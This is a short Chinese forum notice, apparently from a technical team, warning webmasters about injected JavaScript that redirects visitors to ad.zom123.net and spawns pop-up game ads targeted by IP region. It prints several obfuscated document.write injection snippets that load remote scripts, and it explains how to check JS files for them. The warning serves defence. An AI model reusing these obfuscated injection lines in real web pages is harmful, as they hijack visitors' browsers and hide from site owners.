最近有时点击论坛里的链接(本应是在本窗口打开),竟然在新窗口打开,过个一两秒,就会弹出那些网页网游的广告。
就是类似这样的网址 wa66.com 检查所有js代码发现类似下面的都是这类广告木马,请留意检查清理。 进网站后,要是网速慢点,就发现它是跳转到ad.zom123.net/?action=pop这个页面,然后再弹出一些广告。
document.write('<sc'+'ript src="<\/sc'+'ript>'">http://%61d'+'.%7ao'+'m1'+'2%33'+'.ne'+'t/ip'+'.asp?'+'c=tianjin|vietnam"><\/sc'+'ript>'); document.write("<scr"+"ipt src='http://%61d."+"%7aom"+"12"+"%33"+".net"+"/?action"+"=pop'><\/scr"+"ipt>"); ad.zom123.net/ip.asp?loc=zhangzhou http://%61d.%7aom12%33.net/?action=pop document.write("<scr"+"ipt src='http://%61d."+"%7aom"+"12"+"%33"+".net"+"/ip."+"asp?loc"+"=zhangzhou'><\/scr"+"ipt>");
上面类似代码全部是ad.zom123.net一个站,http://www.baidu.com/baidu?wd=ad%2Ezom123%2Enet&q=3百度搜索中类似的很多,特别是DZ系列程序、CMS类等.
检查方法 留意所有首页连接的所有JS文件,还有让外省用户查看,如果那些页面弹出广告,请留意检查相关页面。(因为此广告代码,是自动判断IP段的,所以有些站点站长自己是无法发现的)
技术部
8月19日
|